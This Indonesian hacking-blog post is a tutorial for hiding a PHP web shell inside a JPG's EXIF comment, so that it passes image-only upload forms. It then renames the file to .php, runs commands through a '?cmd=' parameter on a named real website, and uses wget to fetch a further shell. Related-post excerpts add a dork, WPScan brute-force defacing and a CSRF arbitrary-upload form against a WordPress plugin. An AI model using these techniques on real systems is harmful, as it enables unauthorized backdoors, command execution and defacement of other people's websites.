Skip to main content

Inject Script PHP ke Image

squadcyber.org - Pernah nggak sih agan ketemu dengan form file upload, tapi hanya memperbolehkan file image only? pasti pernah kan, kebanyakan orang mungkin make teknik tamper data atau bisa juga make live http header, atau ingin menyisipkan backdoor di suatu website agar tidak di curigai admin?, tapi cara ini tidak 100% work.

Nah pada tutor kali ini gw mw share cara manipulasi backdoor ke file jpg,
ya walaupun dengan cara ini tidak mnjamin 100% backdoor akan terupload juga :'v , setidaknya nambah wawasan agan-sista pembaca dsini, mengenai method upload shell backdoor ^_^

Alat 
  • Windows
         - Quick EXIF Editor ( Download di sini )
  • Linux
        - Exif (apt-get install exif)
        -
Exiv2 (apt-get install exiv2)
        -
Jhead (apt-get install jhead)

        NOTE : install salah satu saja, pada tutorial kali ini gw make jhead (jpg only)

 Code PHP Inject

Plain Text


With Image


 Tutorial Inject PHP ke Image

Windows

Buka tool tadi yang sudah kalian download
 Pencet open, dan cari gambar yang mau di sisipkan kode php
Lalu klik tanda +
Klik yes untuk melanjutkan
Type di isi dengan DocumentName, dan vakue kalian isi terserah, lalu klik ADD.

 Setelah itu, kita klik pending change (lihat gambar di bawah)
Lalu klik file yang kita edit tadi, dan klik Edit Modification.
Lalu pastekan kode inject tadi di kolom values, dan klik save.
Lalu klik OK and Close.
Klik Commit Change.
Lalu tentukan dimana kalian akan mengimpan file tersebut, dan klik save.
Kita cek apakah image nya sudah ke inject, buka dengan notepad ++
Kalau udah muncul kayak gini brati kode nya berhasil ke inject di gambar nya.


Linux / Termux

Pertama siapkan gambar yang akan di sisipi script php.
Setelah itu buka terminal linux atau termux kalian, dan cari dimana tempat gambar yang kalian simpan dan ketikkan kode di bawah ini untuk membersihkan komen pada gambar tersebut.

$ jhead -purejpg namafile.jpg

Setelah bersih gambar nya dari komen, lalu ketilkan kode

$ jhead -ce namafile.jpg

Maka akan muncul vim text editor seperti gambar di bawah ini.
Dan masukkan kode inject php di atas tadi, lalu save dengan pencet ALT + :wq .

Setelah ter save komen baru di image tadi, kita coba cek apakah sudah masuk script inject php tadi dengan mengetikkan.

$ jhead namafile.jpg

Jika muncul seperti gambar di atas berarti kode inject php sudah masuk dalam gambar tersebut.

Eksekusi Target Dengan Image Inject Scipt PHP

Pertama kalian harus punya target terlebih dahulu, di sini gw sudah punya target dan sudah gw upload di web tersebut, sebelum di upload ganti ext file img yang sudah kalian inject script php tadi dari namafile.jpg menjadi namafile.php.

Cara menggunakannya cukup dengan mengetik

/namafile.php?cmd=

Dan ketikkan kode terminal seperti hal nya terminal linux atau termux kita.

Contoh :

http://www.acershowroom.com/alien.php?cmd=ls -la

Maka akan muncul seperti ini.
Atau juga bisa kalian buka dengan view source agar lebih jelas.

Dan untuk upload shell kalian cukup dengan wget dan pastekan link shell kalian yang berformat .txt lalu ubah ext nya ke .php dengan mengetikkan seperti cara yang tadi gw jelaskan.
Demikian tutorial cara inject script php ke file gambar.

Thanks to CYBERSCRY untuk shell nya mwehehe :v

Refrensi : http://blog.yuzaside.com/2016/10/trik-inject-php-script-ke-file-gambar.html





Comments

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...